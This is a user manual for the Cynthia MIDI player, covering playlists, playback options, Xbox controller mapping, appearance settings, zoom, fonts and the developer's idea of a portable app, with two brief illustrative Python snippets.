If you are curious what the playlist format looks like, click the " Copy All" link (if shown) or " Edit > Copy All" to copy the entire playlist to Clipboard.  Note that Cynthia will use a full filename for each listed midi file, since the Clipboard cannot be referenced from a disk location.  You may paste it into any text editor to view, modify, or rearrange the order of the midi files listed.

To paste an altered playlist back into Cynthia, click the " Replace" link (if shown) or " Edit > Replace".  The Play List panel will update.

Cynthia has support for extended playlists.  Note!  A large playlist of 100,000+ midi files will use about 102MB of RAM and require a second or two to apply midi filename adjustments.

Support for playlist filtering is provided.  An example:  You may instruct Cynthia to list only ".mid" files by deselecting ".midi" and ".rmi" options from the "File Types" option panel (right column).  The playlist itself remains unchanged - how Cynthia uses it changes.

Toolbar Links
Edit - Show edit menu
New - Prompt to clear playlist
Open - Open a playlist from file
Save As - Save playlist to file
Cut - Cut selected playlist item to Clipboard
Copy - Copy selected playlist item to Clipboard
Copy All - Copy entire playlist to Clipboard
Paste - Add Clipboard playlist to end of current playlist
Replace - Replace current playlist with Clipboard playlist
Undo - Undo last change to playlist

Tips :
The current playlist is remembered for next time Cynthia is started.

To show or hide the above toolbar links, tick or untick the " Edit > Show Links on Toolbar" option.  Unticking the option hides all links except " Edit" and " Paste".

Which playback method to use? Play Folder or Play List?

If you're a lover of simplicity itself, wishing only to play midi files directly from your hard drive folders as is, or you're a playlist fan, rest assured: switching between these two very different playback systems is as easy as a single click on either the " Play Folder" or " Play List" links.

Whilst the Play Folder method is limited to playing only the files contained in the currently selected folder, there is zero setup, no list to be built, and playback can start without hassle.

The Play List method on the other hand allows for a far more in depth custom playback experience.  It supports the playback of midis across multiple disk drives, folders and in any assembled order.

Additionally, Cynthia's large capacity list can easily handle a very large playlist.  For example a playlist of 10,000+ midis is just fine.

And switching between these two playback methods can be done during playback without issue.

Tip :
The playback options File Types, Playback Mode, Playback Device, Speed and Volume are shared between both playback systems, and do not change or require adjustment after a switch.

Option: Playback Mode

Located bottom of left column.

Playback mode (bottom left) determines how Cynthia plays the list of midis in the Play Folder or Play List panel (left column).

Once
Play currently selected midi to the end, and stop playback.

Repeat One
Repeat the currently selected midi without stopping playback.

Repeat All
Play each midi in turn, working down the list (left column), then restart from the top.  Playback initially starts at currently selected midi.

All Once
Each midi in the list is played working downward through the list.  Playback stops at the end of the last midi.

Random
Continuously play a midi, selecting each new one randomly from the list.

Option: File Types

Located towards bottom of right column.

There are three midi file types supported: ".mid", ".midi" and ".rmi".  The first two are identical file formats, only the file extension differs.  The third format, ".rmi", is slightly different and contains additional multimedia information for Microsoft Windows.

By default all three file types are selected (lit black).  In this state, all playable midi files are listed in the Play Folder and Play List panels.

To restrict the file types to be played back, click the file type to deselect it.  The list of midis (left column) updates to reflect the change.

If all three options are deselected, Cynthia interprets this as if all three were selected.

Option: Playback Device

Located towards bottom of right column.

By default all midi playback is sent to the Windows Midi Mapper system - the default Windows midi note handler.

If you have more than one midi device installed on your computer, Cynthia can redirect the midi notes to that device instead.

Traditionally, a midi device had been considered to be hardware.  But now, with the advent of powerful computer hardware, software can act as virtual hardware, allowing for advanced features to be included on your computer without the need for hardware upgrades or physical adjustment.

A midi software driver can support a soundfont, which can greatly enhance the playback quality of a midi through its support for large, high-quality, instrumental sound libraries.

To change the playback device, select a number in the playback device control (bottom right).  Up to ten devices (1-10) are supported.  "Map" is the Windows Midi Mapper.  Selecting a dash will cause playback to stop producing audible sound (no device selected for sound output).  In this case, the last usable (numbered) midi device will be automatically selected after a short time delay, recommencing audible playback without the need for user input.

Cynthia supports realtime device switching during playback.  A small, momentary interruption to playback may occur during a device change.  The name of the device in use by Cynthia is listed in the playback device control (bottom right), for example as "Playback Device: Midi Mapper".  In later versions of Microsoft Windows the Midi Mapper was discontinued - in this case, Cynthia uses the first installed midi device.

It is worth noting that using another device may require a separate adjustment to that device's volume control - some devices have one, and some do not.  If it does have a volume control, it is more than likely to be accessible via the Windows "Volume Mixer" application.  Click the " Mixer" link from the top toolbar to display the application and adjust the volume control of your device accordingly.

Option: Speed

Located towards bottom of right column.

By default, Cynthia plays back a midi at normal speed (100%).  Drag the slider to the right to increase the playback speed up to a maximum speed of 1,000% or 10x normal speed.

To slow down playback speed, drag the slider to the left.  A value less than 100% slows playback to less than normal speed.  The slider can go as low as 10% or 1/10th normal playback speed.

Playback speed may be adjusted at any point during playback.  All changes take place in realtime.  An auto-fade in feature momentarily quietens playback to avoid any sudden or unexpected notes.

Option: Volume

Located at bottom of right column.

For maximum compatibility between different operating systems and device types (hardware and software) and their capabilities, Cynthia employs a multi-layer volume control system which adjusts both hardware and midi note volumes.

To adjust playback volume, position the slider to the right to increase the volume and to the left to decrease it.

An increase above 100% boosts the midi volume, making low-level, hard-to-hear midis more discernible.

Option: Playback Progress

Adjust playback position with a single click or tap.  Additionally, hovering a mouse cursor over the Playback Progress bar displays a vertical marker for the new playback time and position.  Click to apply the new position.  The midi playback will shift to the new position and automatic fade-in eases back playback volume to avoid sudden clicks, pops or abrupt notes.

Use keyboard arrow keys to progressively move forward or backward through the midi.  A vertical marker will display.

Not currently playing?  Click in the Playback Progress bar to commence playback at that position.

Lyrics

Synchronised lyric display is supported for midis with lyrics.

To enable lyrics, from the main toolbar click the " Menu" link and tick "Show Lyrics".

When included within a midi, lyrics are displayed inside the Playback Progress bar (bottom of Cynthia) as "Playback Progress - Lyrics:" with several words or part words visible at any one time.

A midi without lyrics will display "Playback Progress".

If hyphenated lyrics are required in order to highlight the pauses between part-words, from main toolbar click the " Menu" link and tick "Hyphenate Lyrics".

Always on Midi

Sometimes there can be a short, noticeable delay when playback first commences.  This delay is preparation time for Cynthia to ready playback.

There is no delay switching between midis during playback as Cynthia remains connected to the midi device.  By default, after a short period of no playback (5 seconds or more), the midi device will switch to offline, and a short delay will occur when playback is next started.

To avoid this delay, the "Always on Midi" option may be used to keep a midi device online, even when Cynthia is not playing.  From the main toolbar click the " Menu" option and tick the "Always on Midi" option.

Tip :
You can always tell if the midi device is online or not - from the "Midi Information" panel on the right.  Look for the item called "Device" in the "Technical list".  This will either be "Online" or "Offline".

What midi formats are supported?

Midis come in various format types.  The simplest is format 0, a single-track format that stores all its tempo (speed), notes and commands on a single, mixed track.

A format 1 midi, on the other hand, uses a dedicated master track (first track) to store all of its tempo (speed) commands for the entire midi.  Notes and commands are stored separately on additional, multiple tracks.

Cynthia supports both format 0 and format 1 midis with file extension ".mid", ".midi" and ".rmi".

A third format, format 2, also exists.  This format type is not supported by Cynthia.  In addition, Cynthia does not support system exclusive messages.  These messages will be ignored, and typically relate to manufacturer-specific equipment.

Using an Xbox Controller to control Cynthia

Cynthia must be set up to use an Xbox Controller.  From the top toolbar select "Menu > Xbox Controller" and select the "Active Only" or "Active and Inactive" option.  Pair an Xbox Controller with your computer (if not already done).  Cynthia automatically detects and uses active Xbox Controllers.  More than one controller can be used at the same time.


1. Left joystick - left/right to adjust volume, push down to toggle between Play Folder and Play List modes
2. D-pad - left/right to switch midi playback device, up/down to switch between songs in navigation panel
3. View button - Go to beginning of song
4. Share button - Not used
5. Menu button - Toggle through playback modes: Once, Repeat One, Repeat All, All Once, and Random
6. Right joystick - left/right to change song playback position, push down to toggle full screen mode
7. Left bumper (top) - toggle display of navigation and piano panels
8. Right bumper (top) - toggle display of midi information and tracks, channels, and notes combination panels
9. Left trigger (bottom) - reduce playback speed
10. Right trigger (bottom) - increase playback speed
11. X button - reset playback speed to 100%
12. Y button - reset volume to 100%
13. B button - start/stop playback
14. A button - select folder in navigation panel (when in Play Folder mode)

Change the coloring of the app's GUI

From the top toolbar click " Options" or the app menu "... > Options" (top right of window).  An "Options" window will display.  Select the " Color" tab to show the list of color schemes.

The "Color Schemes" list is split into three sections:
1. Built-In color schemes - read only/use as is
2. Custom color schemes - user customisable and labelled Custom 1-10
3. Saved color schemes - user customisable and saved as file(s) on disk

There are 160+ built-in color schemes to choose from.  Simply select a color scheme to apply in realtime.  For instance, Aqua Marine.  Watch as the app's GUI changes color instantly - no need for an additional load, apply, or set.

A Blaiz Enterprises color scheme (*.bcs) is, at its core, a list of twenty colors responsible for coloring most aspects of the app's GUI.  Some specialised colors are derived automatically from these.  Two colors are for the frame, nine are for important areas (Title colors), and nine more are for common zones (Standard colors).

Each built-in color scheme has its own unique set of colors.  A custom color scheme allows for colors to be customised.  To create a custom color scheme, scroll down the list to the section titled "Custom".  Here you'll find ten custom color scheme slots - each fully customisable in realtime without any need to be named, saved or applied.  Tap or click on a slot to start - for example slot 1 - "Custom 1".

On the right a series of editable color palettes will appear.  Click a palette to display the color dialog window.  Adjust color as desired and click OK when done.  Alternatively, click and drag your mouse cursor/fingertip from the color palette to acquire color from your computer screen in realtime.  App GUI continuously updates to reflect changes in color.  All changes are automatically saved.

Give your new color scheme a name

Want your shiny new color scheme to have its own name?  Easy.  From the color schemes list - click "Options > Color" to display the dialog - scroll down to the "Custom" section, select your custom color scheme, and click " Menu > Save As...".  Type a name and click the "Save" button.  Your color scheme is saved to disk and listed under the "Saved" section of the color schemes list - the next section down.

Any color scheme can be saved to disk, and then edited.  For instance, you can select one of the built-in color schemes, such as Aqua Marine, and save it to disk, then customise as desired.

How to use your named color scheme

Click "Options > Color" to show the color schemes list.  Scroll down to the last section named "Saved".  This section presents a list of all your saved color schemes in one central location.  Select a scheme to use.

Can I edit my saved color scheme without having to re-save it/load it etc?

Yes.  Any saved color scheme can be customised without fuss.  Click "Options > Color" and scroll down to the section named "Saved", click the color scheme you wish to edit, and adjust the color(s) as desired.  All changes are saved automatically back to the file on disk, without any need to explicitly save.

What is a background scheme?

A background scheme is a static or animated image tiled across the background layer of the app.  The app's GUI components - such as toolbars, tool images, buttons and text - sit above this layer and merge into it.  There are 60 built-in background schemes, based on several images with different presets, like horizontal and vertical scroll speeds, fade in and out rates, and wobble levels.  These functions allow a static image to give movement to the app.  Some background schemes are specially set for animation, while others are not.

The background image can be rendered in full color, or shade-shifted toward greyscale, or shade-shifted toward the app's current highlight color.  One slider, Colorise, controls this tri-function.

A background scheme supports a maximum image color depth of 32 bits in RGBA format - 8 bit red, green, blue, and alpha channels - for instance a transparent PNG image.

Note :
An animated background scheme can operate at frame rates of up to 20 fps (frames per second), which means the entire GUI of the app is repainted in full, 20 times per second, like a video, and therefore can consume quite a bit of CPU power, especially at high resolutions.  It is recommended a modern, powerful machine be used for high frame rates/resolutions in order to maintain smooth operation of the GUI.

Sliders and their meanings :

Strength (0..255):
Determines how much of the background image is seen/made visible.  A low value renders the background subtly beneath the GUI, whereas a high value, 100-255, renders it boldly.  A value above 100 is disabled by default.  To enable, click "Options > Settings" and deselect "Display > Safe Background".  A value over 100 may overpower the GUI making it hard to navigate or operate.  If this becomes the case, press the "F2" key, and then the Enter key to confirm restoration of the app's default settings.

Colorise (-100..100):
Set the color rendering method.  A value of 100 renders the background image in full color, a value of 0 in greyscale, and a value of -100 in the app's current highlight color.

Speed (0..20):
Paint speed in frames per second.  0 is static - the background scheme only repaints when required.  This is the least stressful option.  A value of 1-20 sets a constant repaint cycle of 1-20 fps (frames per second).

Horizontal Scroll/Vertical Scroll (-100..100):
Moves background image left/up (minus value) or right/down (plus value) by X pixels.  A value of zero turns movement off.

Horizontal Wobble/Vertical Wobble (0..300):
Applies a wobble factor to the above Horizontal Scroll/Vertical Scroll movement(s).

Fade In/Out (0..50):
Cycles through a high-to-low-to-high intensity flow, gradually fading the background image from view, then back again, in a continuous cycle.  Use a low value for a slow cycle, and a high value for a fast cycle.

Fade Wobble (0..200):
Applies a wobble factor to the Fade In/Out flow cycle above.

Can I customise a background scheme/background image?

Yes you can.  There are 10 custom background scheme slots.  Click "Options > Background" and scroll down to the section named "Custom".  For instance, click on "Custom 1".  A sub-toolbar will display at the top of the right column.  From there, you can paste in an image from Clipboard - click "Paste" - or open an image from file - click "File".

For best visual results, your image should be a similar size to the app's overall area, and be prepped for tiling work - that is, have its right and bottom edges modified so that its colors/pixels seamlessly wrap back round to the opposing edge (right-to-left and top-to-bottom).  You can use a tile creation app or a good quality graphics app to accomplish this, or use our "Blend It" app to prep your image.

Without this, tiling the image may present abrupt edges of unwanted opposing lines of horizontal/vertical colors, and be visually jarring in nature.

Adjust the sliders as required to accomplish animation and visual effects.  All changes to the image and sliders are saved in realtime.

How do I change the frame style, size and sparkle strength/effect?

The frames on our apps have a long history reaching back to the late 1990s, when they first adorned our FastCards and PowerCards (still/animated electronic musical greeting cards).

In the context of an app, they primarily serve as a large, easy-grip area for resizing the app's overall size, and a touch of decoration to boot.

A frame can be made wide or narrow as required.  The modern app has a typical frame width of 7 px in a plain style, so as not to distract or occupy excessive screen real estate.

Furthermore, a frame may render with an optional, randomised sparkle effect, with a range of 0 (no sparkle) to 20 (heavy sparkle).

Click "Options > Frame" to edit the app's current frame settings.  A list of 50 built-in frames is available to choose from, ranging from Antique to Traditional 5.

Toward the bottom of the window are two sliders to adjust the frame's Sparkle (strength) and Size (width in pixels).  A frame can be sized from 0 px (no frame) up to a wide frame of 72 px.  All changes update in realtime.

Automatic zoom and scaling of app text and images on high resolution displays

Click "Options > Font" to display zoom and font specific settings.  By default, the app is set to automatic zoom, which means it will scale up its text and images if the monitor it's displayed on is above 2K in resolution.

Why scale text and images at all?  What is special about 4K and 8K monitors?  At first glance, the significant difference between standard 2K resolution and the much higher 4K and 8K resolutions may not be obvious.

But high resolution monitors, such as 4K and 8K displays, have far more pixels (colored dots) per inch on screen than previous generations of monitors - that is, the screen size may be the same, but more dots are packed into the same area.  Consequently, an app without scaling abilities may appear small or even blurred on these monitors.  That's because as new monitors and TVs gain ever greater resolutions, statically sized apps shrink in size or fail to compensate.  This is why a modern app must be able to scale up to match the appropriate resolution.

Here is a comparison of common display resolutions:
2K = 1920w x 1080h =  2,073,600 pixels
4K = 3840w x 2160h =  8,294,400 pixels
8K = 7680w x 4320h = 33,177,600 pixels

A 4K (ultra high definition) monitor uses four times (4x) more pixels than its 2K (full high definition) counterpart.  A statically built app without scaling would shrink to 50% of its size, making it difficult to use.  An operating system may attempt to counter this by scaling it up using pixel stretching - very much like zooming up a photo - but unfortunately this tends to blur the appearance of the app.

The same app on an 8K monitor would suffer even greater shrinkage, rendering at only a quarter (25%) of its original size, or scaling with significant blurring.

This app has a built-in zoom mode, which multiplies the width and height of its text and images by a factor of 2, 3, or 4, dependent on the resolution of the display.  This does away with the need for the operating system to stretch/scale its pixels.

On a 2K monitor there is no need to scale, as this is the app's intended resolution.  On a 4K monitor the app switches to a zoom factor of 200% (2x), upscaling text, images and the main window's dimensions accordingly, and to 400% (4x) on an 8K monitor.  The end result is an app that appears appropriately sized across different monitor resolutions.

You can override this automatic zoom function and set your own zoom value of 100%, 200%, 300%, or 400%, if desired.  This option may be useful on a custom display resolution and/or in a multiple monitor display environment.

Note :
Setting the zoom value to 300% or above on a 2K monitor may render the app so large as to make it unusable.  If this occurs, you can press the "F2" key at anytime to restore the app's default settings.

Change app text size

The text size (font size) can be set between 6 and 24.  Click "Options > Font" and choose a size option.  Any change updates the app text in realtime.

In some instances, the app may display slightly larger or smaller text in special areas, however this text is directly scaled from the size set.

By default the app uses a size of 10.

Note :
Not all sizes are supported by all fonts.  On Ubuntu for instance, a large font size for Arial can cause text to appear weird or slightly off.  If this occurs, try reducing the font size a tad, or alternatively select another font (font name).

Change app font

A font determines what sort of characters appear on the screen, and in what style.  Click "Options > Font" and choose a font name (font) from the list of options, from Arial to DejaVu Serif.  Any change updates the app in realtime.

Older fonts like "System" were simple formats constructed from small images or bitmaps, one per character, and did not scale up very well, partly because to save on memory, not all character sizes were stored inside the font.  Today, modern fonts use mathematical vectoring to draw shapes and lines etc to construct characters on the screen, though the infrastructure and overhead required for such fonts can be complex and heavy on a computer system.  But because these fonts employ mathematics to draw their characters, they do scale up well.

Eleven common font name options are presented for best compatibility and visual appearance, taking into consideration operating systems as old as Windows 95, through to modern-day Windows 11, and other systems such as Mac and Linux.

In general, you want a font that is widely supported and guaranteed to render well on most computers.  Bearing that in mind, Arial is a good choice, as it is widely supported by operating systems going as far back as Windows 95, if not further.

If a font name is selected but is not supported by the current computer, for example "DejaVu Sans" - not supported by Windows 95 - a close approximate/fallback font is used instead.

For a specific/custom font, click the "Custom" option once to switch it on, and click it again to display a Font dialog.  Choose the font name from the list of fonts and click the "OK" button when done.

If the app becomes unreadable, or hard to read after choosing a new font name - it can happen with a bad font, a foreign language font, or a symbols only font like "Wingdings" - press the "F2" key to restore the app's default settings.

Change app font feathering/antialiasing For maximum font compatibility, two completely separate methods have been employed to render text with antialiasing.

Click "Options > Font" for font settings.

1. The first method, Font Feathering, is a simple feather designed specifically to outline each text character in realtime.  This has the effect of gently softening the often harsh outline of text characters on LCD screens, which by their nature do not blur neighbouring pixels, as older CRT (cathode ray tube) monitors did.

The feather is universally applied to both bitmap fonts (older image based fonts) and vector fonts (newer mathematical fonts).  In this way it allows for a quick and direct text feathering technique that is easily adjusted to suit, without the need for complicated or tricky multi-step setup configurations and/or processes.

As a bonus, it works on older operating systems - e.g. Windows 95 - which back in the day had no need/support for it, as LCD monitors were not widely used.  It also works on fonts that don't have any embedded feather information, or for smaller font sizes that at times can abruptly discontinue feather support.

This method generates an even, edge-based blurring of the outermost pixels of the text characters.  A high value - high or ultra - renders a strong/bold feather, and a low value reduces this to a more subtle display.

Any change updates in realtime.

On a high quality computer monitor where all pixels are transmitted and displayed without any color loss, a "Low" value is typically sufficient to render text gently on the screen.  But TVs, which tend to heavily compress their video streams for speed, lose some color information and therefore may require a higher setting of "Medium" or "High" for similar results.

2. The second method, Font Specific Antialiasing, relies on the font itself to provide all feather based information.  This is usually an 8 bit greyscale range of 0-255.  The downside is, if the font has no feather support, or the operating system is old, e.g. Windows 95, then no antialiasing will appear.  This method can sometimes be hit and miss.

For instance, take the font Arial: it is universally supported, but surprisingly loses feather support at 12 pt or less, leaving only sharp text characters to be rendered on screen.

To adjust the antialiasing strength, select an option from "Dark" (strong) to "Light" (subtle).

By default, options 1 and 2 above are set to "Low/Dark", which provides the best fit for a wide variety of fonts and their behavior over a broad spectrum of old and new operating systems.

App startup style The app can be set to start up in various ways: normally, minimised, maximised or in fullscreen mode.  To adjust, click "Options > Settings" and set an option under "Start Style".

Normal:
Starts the app as a window, which is the default mode.

Minimised:
Starts the app hidden from view as a button on your taskbar.

Maximised:
Starts the app as a window, maximised to fill all the available work area on your desktop.

Fullscreen:
Starts the app in fullscreen mode, blocking out everything else on your desktop.

Note :
If the app has the "Multi-Monitor" option selected (next section down named "Display"), then modes "Maximised" and "Fullscreen" will render the app over the combined screen real estate of all monitors.

Create a link to the app on your Start button and Desktop, and the Automatic Startup option The app can create, maintain and remove links for you.

There are three link types supported:
1. Start button
2. Desktop
3. Automatic Startup

Click "Options > Settings" to adjust.

1. The first link type, Start button, creates and automatically maintains a link - also known as a shortcut - on your Start Menu called "Cynthia by BlaizEnterprises.com".  As this link is created and maintained by the app, you must unselect the option to remove the link from your Start Menu.

2. The Desktop link operates identically to the above, maintaining a link on your Desktop named "Cynthia by BlaizEnterprises.com".  It also must be unselected to remove the link permanently from your Desktop.

Note :
As long as either options 1 or 2 above is selected, then the corresponding links are maintained and automatically re-created if need be by the app, even if they're manually deleted from outside the app.

By default, neither option is selected.  Optionally, you can create your own manual link/shortcut to the app using Windows with any name/label you wish.

3. The last option, Automatic Startup, creates a link to the app in the startup location of your computer, informing Windows to launch the app when your computer boots/starts up.  Again, this link is automatically maintained, therefore unselect the option to remove it.

Note :
If any of the links above are selected and you plan to remove/delete the app from your computer, it is highly recommended you first unselect all the options above (1-3), then remove/delete the app.  Otherwise, Windows can get a little weird and put the links back in some cases without any interaction from the app itself, even if the app is no longer present.  This behaviour was observed with earlier versions of Windows 10.

A few important app settings explained The majority of the app's important system settings can be found in one location - click "Options > Settings".

An option is considered "on/enabled/selected" when lit, and "off/disabled/unselected" when unlit.

Round Corners:
Render all visual controls, windows, and dialogs with round (curved) corners.

Soft Close:
Automatically close an active dialog window when a click/tap strikes outside the window area - e.g. Save, Open, Font, Options dialogs.  This can speed up typical workflows by skipping the need to specifically click the OK or Cancel buttons to close the dialog.  For instance, click "Options" to display the options dialog, change a few settings and click/tap outside the window to close it and save changes.  Also convenient to cancel a dialog displayed by mistake/change of mind, such as a Save dialog.

Safe Area:
Retains app window on screen at all times, and any sub windows or dialogs within the app.  Any attempt to drag the app out-of-range triggers an automatic position correction - a passive system that continuously checks the window position and monitor size.  Supports both single and multi-monitor modes.

Show Splash:
Displays an informative/artistic splash screen on app startup.  Unselect to disable.

Realtime Help:
Scrolls control-centric help across the top of the current window, dialog, or menu.  Hover mouse cursor over / tap finger on a control for related help.

Hints:
Hover mouse over / tap finger on a control to display help related information in a popup bubble

Touch:
Comfortably enlarge controls and menus for touch access (finger taps)

Double Clicks:
Some options work best with a double click / tap for confirmation.  This option supports the traditional double click mode.  For example, navigating a disk drive using a double click / tap to switch between folders.

On Top:
Set the app above all other apps and windows

Economy:
Normal app operation can use a lot of paint cycles and CPU power, especially if it's rendering graphics and effects continuously on the screen.  Economy mode throttles back this usage during periods of extended idleness, e.g. when there is no direct app keyboard input, or indirect mouse cursor movement or finger taps.  For more specific information refer to the topic "Economy mode".

32bit Graphics:
Not noticeable on today's powerful computers with their 32 bit monitors and video cards; however, it can deliver a small performance improvement on older computers running 24 bit graphics.

Frame Maximised:
Show the app's frame whilst maximised.  The frame is always hidden whilst in fullscreen mode.

Safe Background:
An optional static or animated background scheme can be set, which renders an image beneath the GUI.  If this image is too bold / strong the GUI can be hard to view / use.  By default this option limits the background strength to a safe maximum level of 100.  Unselect this option to permit the full range of background strength (0-255).  If the GUI becomes hard to use or unreadable, press the "F2" key at any time to restore the app's default settings.

Multi-Monitor:
Permit the app to span the full range of attached monitors when maximised or in fullscreen mode.  By default the app spans the current monitor only.

Center Title:
Position the name of the app in the center of the app's window header

Toolbar Alignment:
Align the content of all participating toolbars to the left, center, or to the right

Color Contrast:
Color coordinate important system settings and options into color specific input panels for rapid visual identification

Monochromatic Images:
Use high-contrast, color-adaptive, monochromatic tool images on the app's GUI

Highlight Above:
Retain highlight areas and other important GUI zones whilst a background scheme is in use

Brightness:
Adjust the brightness of the entire app, from 60 being the darkest right up to 130 being the brightest.  Any change takes effect immediately.  The default brightness is 100.

Unfocused Opacity:
Renders the app translucent upon losing focus - e.g. when another app is in use.  Available range is 30 (almost invisible) through to 255 (fully visible).  Default value is 255.  This feature requires support of a modern operating system and is therefore not supported by Windows 95/98 etc.

Speed:
The speed by which to transition the app from a focused state to a non-focused state or vice-versa.  Speed range is 1-10, where 1 is the slowest and 10 the fastest.

Focused Opacity:
Renders the app translucent upon gaining focus - e.g. when the user interacts with it.  Available range is 50 (almost invisible) through to 255 (fully visible).  Default value is 255.  As above, this feature requires support of a modern operating system and is therefore not supported by Windows 95/98 etc.

Cursor:
Change the default cursor to one of the built-in cursors, each of which scale from small to large, according to the current size set by the operating system.  A range of static colors are available: Red, Orange, Pink, Yellow, Purple, Aqua, Blue, Green, Grey, Black, White, along with Default and Custom.

In addition, two dynamically colored cursors are included: "Adaptive - Hover" and "Adaptive - Title".  These special cursors acquire their color from the current color scheme.  Any change to the color scheme is reflected in the color of the cursor.

The custom cursor option supports both static (".cur") and animated (".ani") cursor file formats.  To use, select the "Custom" option.  The cursor will update if previously customised.  To change the cursor, click the option again and select a cursor file using the Open dialog.

Frame Sparkle:
Applies a random texture to the app's frame.  Select a value from 0 (off) to 20 (bold).

Frame Size:
Adjust the app's frame size (width in pixels) from 0 (none) to 72 (wide).  The default frame size is typically 7.

Scrollbar Size:
Set the width and/or height of the app's scrollbars.  A value of 5 (thin/short) to 72 (wide/tall) is supported.

Wine Compatibility:
Wine is basically a large computer instruction conversion app, which allows an app designed for Microsoft Windows to execute ("run") on another operating system, such as a Mac or Linux.  Because Wine does not emulate / bridge any logic gaps and only translates an app's instructions, the underlying computer hardware must match that used by Microsoft Windows - namely Intel and AMD64.

A notable exception to this requirement is the modern-day Mac, e.g. Mac Mini, which runs an Intel emulator under the hood.  This allows a Microsoft Windows app to run by the following sequence: App to Wine to Intel emulator to Apple hardware.  Incredibly, this appears to be a very effective and rather efficient strategy, especially for our lightweight apps.

Although Wine's functionality is both wide and impressive, there is some functionality that falls short of Windows.  The Wine Compatibility option compensates where possible for important shortcomings, such as volume handling, and allows the app to maintain functionality.

The default option is automatic and detects the presence of Wine based on the existence of drive "Z:\".  For more information on Wine refer to their website www.winehq.org .
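For illustration, here is a minimal Python sketch of that detection heuristic - assume Wine is present when drive "Z:\" exists, which Wine typically maps to the host's root filesystem.  This is a sketch under that assumption, not the app's actual detection code.

# Illustrative sketch only - not the app's real detection code.
import os

def running_under_wine() -> bool:
    # Wine typically exposes the host's root filesystem as drive Z:\
    return os.path.exists("Z:\\")

if __name__ == "__main__":
    print("Wine detected" if running_under_wine() else "Wine not detected")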

Restore Defaults:
Easily reset the app's system settings, such as color, font size, zoom level etc to their defaults.  Click the "Restore Defaults..." button at the bottom-right of the Options window or press the "F2" key at any time in the app to display the "Restore Defaults" confirmation prompt.  Confirm your intention to reset and then click the "Restore Defaults" button.  The app will reset to default values.

An app typically has settings in addition to these which are not restored / reset.  Instead, they should be adjusted via the app itself as required.

On Top - Position app above other apps and windows Click the app menu button (top right) and tick "On Top" option.  Alternatively, click "Options > Settings" and select "Display > On Top" option.

Don't show the splash screen on app start By default the splash screen is displayed with a momentarily pause on startup.  This can be switched off by going to "Options > Settings" and deselecting the "Display > Show Splash" option.

Where is my app? / Show the app folder Because this app is portable, you might not remember / know where it is located on your hard disk or USB pen stick.  To access its folder, click the app menu button (top right) and select " Show App Folder".  An explorer window will display with the app's binary (*.exe) and storage folder listed alongside.

Economy mode Running an app at full speed when it's not being used can be a bit wasteful, and may prematurely drain the batteries on your laptop or tablet.  Select this option to automatically throttle back battery / power consumption and CPU / graphic loads after a short idle period of 10 minutes, at which point the app will reduce its paint cycles to a maximum of 2 fps, with a further reduction to 1 fps after 30 minutes.

Internal processing loads will typically be reduced also, lowering the demand on your CPU and batteries further.

A single stroke of the keyboard directed at the app, or a global mouse click, or tap of the finger will instantly disengage the current economy state and return the app back to full operation.

To enable, click "Options > Settings" and select "Display > Economy" option.
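As a rough illustration, the throttling schedule above can be expressed as a simple mapping from idle time to a paint-cycle cap.  The 10-minute/2 fps and 30-minute/1 fps figures come from the text; the 60 fps full-speed value and all names below are assumptions, not the app's real code.

# Illustrative sketch only - not the app's real code.
def max_paint_fps(idle_seconds: float, full_speed_fps: int = 60) -> int:
    if idle_seconds >= 30 * 60:   # idle for 30 minutes or more
        return 1
    if idle_seconds >= 10 * 60:   # idle for 10 minutes or more
        return 2
    return full_speed_fps         # any keyboard, mouse, or touch input restores full speed

if __name__ == "__main__":
    for idle in (0, 11 * 60, 31 * 60):
        print(f"idle {idle // 60} min -> paint cap {max_paint_fps(idle)} fps")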

Some technical limitations of this app The Gossamer Code Foundation - our 4th generation codebase - which powers this app has been engineered with care and patience to a high level of quality and reliability.

As our code is rather unique and almost entirely custom built, there are some technical limitations which make our apps incompatible with some extended features of modern operating systems.

These limitations mainly concern the use of UTF-8 and UTF-16 encoding of text, and more specifically filenames.  At this stage the app works with the legacy Windows-1252 character encoding for both text processing and filenames.  The app is therefore unable to handle foreign language text, or load and save files with special, foreign, or emoji characters in their filenames.  All text and filenames are restricted to English ASCII characters in the Windows-1252 encoding standard.

In addition, some options and minor operations may not work as expected, or at all on operating systems other than Microsoft Windows.  Though an enormous amount of time and effort has gone into harmonising the look and feel, behaviour and reliability of the app across multiple flavours of Microsoft Windows, Linux, and Mac operating systems, it is not always possible to catch every failure point, or in some rare cases make it work properly, though we always endeavor to do our best.

A side note, our codebase is still running well as 32 bit code in 2025.  Yes, 32 bit!  Some might see this as a limitation, but we see it as a flexible, inexpensive, and widely adopted execution pathway with support for many platforms and reuse / life extension of older equipment.

What makes a portable app special? A portable app is a big leap forward for apps in general.  A standard or traditionally engineered app requires a lot of support in the form of libraries, data files, images, scripts, etc and the list goes on.  You get the picture.  Some portable apps out there still include this bundle of bits, they merely offload it into a local folder.  A dump of goodies of sorts.

We tend to see a portable app in quite a different light.  Our vision of a portable app is designed tight, clean, free of bloat, and all data where possible is included directly within, structured right into the fabric of the app itself, and designed from the bare-metal up if required.

Though the most important difference between a traditional app and a portable app is that a portable app will not install on your computer.  This is extremely important as the installation process is often messy, and can clutter up your computer by dumping a lot of stuff all over the Windows file structure and registry, and over time may slow down and decrease the overall performance of your computer.

A portable app will not do this, which keeps your computer clean and running smooth and fast as it should.  Unfortunately most software is not designed with portable in mind.  They're more akin to a large leaky box of bits than tight engineering.  And because a portable app is not installed on your computer, it runs outside the normal scope of the operating system, and is not locked down or tied to it.  And thus can be moved about, from disk to disk, or computer to computer.

Typically a portable app will reside on a USB pen stick, removable media, or in a special folder on a portable hard disk.  This makes it easy to take from one computer to the next, and use over and over.  An immensely valuable freedom, and something an installed app can only dream of.

But a serious technical hurdle must be overcome for a truly portable app to be free.  And that is the humble setting.  Yes, a portable app must be able to handle its settings on its own.  It must be able to read them from disk, filter them, check and correct them where required, and write them back to disk.  All without the help of the Windows registry or other operating system dependent structures.

An installed app typically can't or won't do this.  Instead, it relies on Windows and the registry to manage its settings and other important data sets for it.  It therefore takes a higher degree of technical competence to escape this "tied to the operating system" situation.

Here is our current standard for a portable app:

  • Require no installation or setup
  • Require no additional DLL libraries to run and perform its core function
  • Make no alteration to the host operating system, or its settings, files, libraries or core functions, or the Windows registry, unless it forms a part or a whole of the app's core function, and then, only when initiated by the user
  • Be able to run "out of the box"
  • Require no compiling, conversion, installation or setup of support structures in order to execute, except for when such an environment constitutes an execution enabling environment, such as a command translation service like Wine
  • Be free of zipped or otherwise externally bundled blob structures containing folders, files and bits
